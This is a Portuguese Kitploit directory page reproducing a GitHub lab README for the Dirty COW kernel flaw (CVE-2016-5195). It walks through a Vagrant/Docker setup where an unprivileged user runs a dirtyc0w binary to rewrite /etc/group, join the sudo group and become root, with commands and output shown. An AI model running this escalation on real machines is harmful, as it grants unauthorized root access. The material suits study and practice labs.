Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Dirty-COW-CVE-2016-5195- — Explore a vulnerabilidade dirtycow para fazer login como root | Kitploit
Ferramentas/GitHubGitHub/zakariamaaraki/dirty-cow-cve-2016-5195-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoEscape de ContêinerLabs e Prática
GitHubzakariamaaraki/dirty-cow-cve-2016-5195-

Dirty-COW-CVE-2016-5195-

Explore a vulnerabilidade dirtycow para fazer login como root

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
25há 5 anosAinda não revisado

Prova de Conceito do Dirtyc0w no Docker

Pré-requisitos:

  • Vagrant instalado

Como usar

Primeiramente, clone o projeto git clone https://github.com/BrolyCode/Dirty-Cow.git Entre na pasta cd Dirty-Cow Em seguida, suba o ambiente com o comando

root@kitploit:~
vagrant up

Assim que o servidor estiver pronto, faremos ssh nele

root@kitploit:~
vagrant ssh

mude para o usuário root

root@kitploit:~
sudo -i

Agora podemos logar como o hacker

root@kitploit:~
docker exec -it -u hacker nginx bash

No diretório em que estamos logados, temos os seguintes arquivos

root@kitploit:~
drwxrwxrwt  2 root root  4096 Nov  26 11:10 .
drwxr-xr-x 41 root root  4096 Nov  26 11:10 ..
-rwxr-xr-x  1 root root  9880 Nov  26 04:52 dirtyc0w
-rwxrwxrwx  1 root root  9880 Nov  26 04:52 dirtyc0w.c

Se fizermos cat no arquivo /etc/group, veremos

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
....

Podemos tentar logar como root

root@kitploit:~
sudo -i

Mas o sistema irá recusar, porque não temos o direito de acesso. Agora vamos explorar a falha em /etc/group

root@kitploit:~
./dirtyc0w 

Ele imprimirá o seguinte no terminal; devemos esperar um pouco de tempo (2/3 minutos).

root@kitploit:~
mmap 7fd0facf4000

madvise 0

procselfmem 1500000000

Então faremos cat em /etc/group novamente

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:hacker
...

Faça login como root

root@kitploit:~
sudo -i

root@27862a2f9973:~#

Limpeza

Saia de volta para o terminal da sua máquina host e execute vagrant destroy

Baixar ferramenta